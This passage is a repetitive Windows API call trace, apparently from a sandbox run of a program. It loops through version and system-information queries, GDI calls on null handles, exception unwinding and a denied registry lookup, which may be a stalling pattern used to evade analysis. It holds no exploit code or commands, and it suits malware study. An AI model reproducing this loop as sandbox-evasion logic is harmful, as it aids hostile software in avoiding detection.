dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.366] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.366] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.366] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.366] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.366] BeginPath (hdc=0x0) returned 0 [0092.366] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.366] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.366] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.366] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.366] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.366] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.366] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.366] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.367] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401dc [0092.367] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401d9 [0092.367] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104782f [0092.367] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047830 [0092.367] CombineRgn (hrgnDst=0x104782f, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=1) returned 1 [0092.367] CombineRgn (hrgnDst=0x1047830, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=4) returned 2 [0092.367] CreateSolidBrush (color=0xff) returned 0x210782e [0092.367] CreateSolidBrush (color=0xff0000) returned 0x1107831 [0092.367] DeleteObject (ho=0x1107831) returned 1 [0092.367] DeleteObject (ho=0xc30401d9) returned 1 [0092.367] DeleteObject (ho=0xc10401dc) returned 1 [0092.367] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.367] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.367] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.367] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.367] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.367] BeginPath (hdc=0x0) returned 0 [0092.367] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.367] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.367] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.367] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.367] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.367] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.367] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.367] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.367] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401d9 [0092.367] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401dc [0092.367] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047832 [0092.367] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047833 [0092.367] CombineRgn (hrgnDst=0x1047832, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=1) returned 1 [0092.367] CombineRgn (hrgnDst=0x1047833, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=4) returned 2 [0092.367] CreateSolidBrush (color=0xff) returned 0x2107831 [0092.367] CreateSolidBrush (color=0xff0000) returned 0x1107834 [0092.367] DeleteObject (ho=0x1107834) returned 1 [0092.367] DeleteObject (ho=0xc20401dc) returned 1 [0092.368] DeleteObject (ho=0xc40401d9) returned 1 [0092.368] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.368] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.368] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.368] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.368] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.368] BeginPath (hdc=0x0) returned 0 [0092.368] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.368] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.368] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.368] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.368] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.368] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.368] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.368] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.368] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401dc [0092.368] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401d9 [0092.368] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047835 [0092.368] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047836 [0092.368] CombineRgn (hrgnDst=0x1047835, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=1) returned 1 [0092.368] CombineRgn (hrgnDst=0x1047836, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=4) returned 2 [0092.368] CreateSolidBrush (color=0xff) returned 0x2107834 [0092.368] CreateSolidBrush (color=0xff0000) returned 0x1107837 [0092.368] DeleteObject (ho=0x1107837) returned 1 [0092.368] DeleteObject (ho=0xc50401d9) returned 1 [0092.368] DeleteObject (ho=0xc30401dc) returned 1 [0092.368] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.368] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.368] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.369] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.369] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.369] BeginPath (hdc=0x0) returned 0 [0092.369] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.369] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.369] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.369] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.369] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.369] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.369] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.369] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.369] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401d9 [0092.369] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401dc [0092.369] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047838 [0092.369] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047839 [0092.369] CombineRgn (hrgnDst=0x1047838, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=1) returned 1 [0092.369] CombineRgn (hrgnDst=0x1047839, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=4) returned 2 [0092.369] CreateSolidBrush (color=0xff) returned 0x2107837 [0092.369] CreateSolidBrush (color=0xff0000) returned 0x110783a [0092.369] DeleteObject (ho=0x110783a) returned 1 [0092.369] DeleteObject (ho=0xc40401dc) returned 1 [0092.369] DeleteObject (ho=0xc60401d9) returned 1 [0092.369] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.369] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.369] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.369] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.369] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.369] BeginPath (hdc=0x0) returned 0 [0092.369] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.369] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.369] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.369] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.369] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.369] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.369] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.370] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.370] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401dc [0092.370] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401d9 [0092.370] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104783b [0092.370] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104783c [0092.370] CombineRgn (hrgnDst=0x104783b, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=1) returned 1 [0092.370] CombineRgn (hrgnDst=0x104783c, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=4) returned 2 [0092.370] CreateSolidBrush (color=0xff) returned 0x210783a [0092.370] CreateSolidBrush (color=0xff0000) returned 0x110783d [0092.370] DeleteObject (ho=0x110783d) returned 1 [0092.370] DeleteObject (ho=0xc70401d9) returned 1 [0092.370] DeleteObject (ho=0xc50401dc) returned 1 [0092.370] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.370] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.370] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.370] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.370] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.370] BeginPath (hdc=0x0) returned 0 [0092.370] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.370] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.370] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.370] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.370] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.370] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.370] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.370] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.371] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401d9 [0092.371] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401dc [0092.371] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104783e [0092.371] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104783f [0092.371] CombineRgn (hrgnDst=0x104783e, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=1) returned 1 [0092.371] CombineRgn (hrgnDst=0x104783f, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=4) returned 2 [0092.371] CreateSolidBrush (color=0xff) returned 0x210783d [0092.371] CreateSolidBrush (color=0xff0000) returned 0x1107840 [0092.371] DeleteObject (ho=0x1107840) returned 1 [0092.371] DeleteObject (ho=0xc60401dc) returned 1 [0092.371] DeleteObject (ho=0xc80401d9) returned 1 [0092.371] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.371] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.371] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.371] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.371] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.371] BeginPath (hdc=0x0) returned 0 [0092.371] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.371] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.371] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.371] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.371] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.371] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.378] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.378] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.378] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc70401dc [0092.378] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc90401d9 [0092.378] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047841 [0092.378] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047842 [0092.378] CombineRgn (hrgnDst=0x1047841, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=1) returned 1 [0092.378] CombineRgn (hrgnDst=0x1047842, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=4) returned 2 [0092.379] CreateSolidBrush (color=0xff) returned 0x2107840 [0092.379] CreateSolidBrush (color=0xff0000) returned 0x1107843 [0092.379] DeleteObject (ho=0x1107843) returned 1 [0092.379] DeleteObject (ho=0xc90401d9) returned 1 [0092.379] DeleteObject (ho=0xc70401dc) returned 1 [0092.379] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.379] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.379] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.379] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.379] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.379] BeginPath (hdc=0x0) returned 0 [0092.379] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.379] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.379] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.379] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.379] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.379] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.379] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.379] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.379] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca0401d9 [0092.379] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc80401dc [0092.379] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047844 [0092.379] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047845 [0092.379] CombineRgn (hrgnDst=0x1047844, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=1) returned 1 [0092.379] CombineRgn (hrgnDst=0x1047845, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=4) returned 2 [0092.379] CreateSolidBrush (color=0xff) returned 0x2107843 [0092.379] CreateSolidBrush (color=0xff0000) returned 0x1107846 [0092.379] DeleteObject (ho=0x1107846) returned 1 [0092.379] DeleteObject (ho=0xc80401dc) returned 1 [0092.379] DeleteObject (ho=0xca0401d9) returned 1 [0092.379] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.379] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.380] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.380] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.380] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.380] BeginPath (hdc=0x0) returned 0 [0092.380] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.380] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.380] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.380] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.380] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.380] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.380] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.380] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.380] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc90401dc [0092.380] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb0401d9 [0092.380] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047847 [0092.380] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047848 [0092.380] CombineRgn (hrgnDst=0x1047847, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=1) returned 1 [0092.380] CombineRgn (hrgnDst=0x1047848, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=4) returned 2 [0092.380] CreateSolidBrush (color=0xff) returned 0x2107846 [0092.380] CreateSolidBrush (color=0xff0000) returned 0x1107849 [0092.380] DeleteObject (ho=0x1107849) returned 1 [0092.380] DeleteObject (ho=0xcb0401d9) returned 1 [0092.380] DeleteObject (ho=0xc90401dc) returned 1 [0092.380] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.380] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.380] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.380] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.380] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.380] BeginPath (hdc=0x0) returned 0 [0092.380] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.380] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.380] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 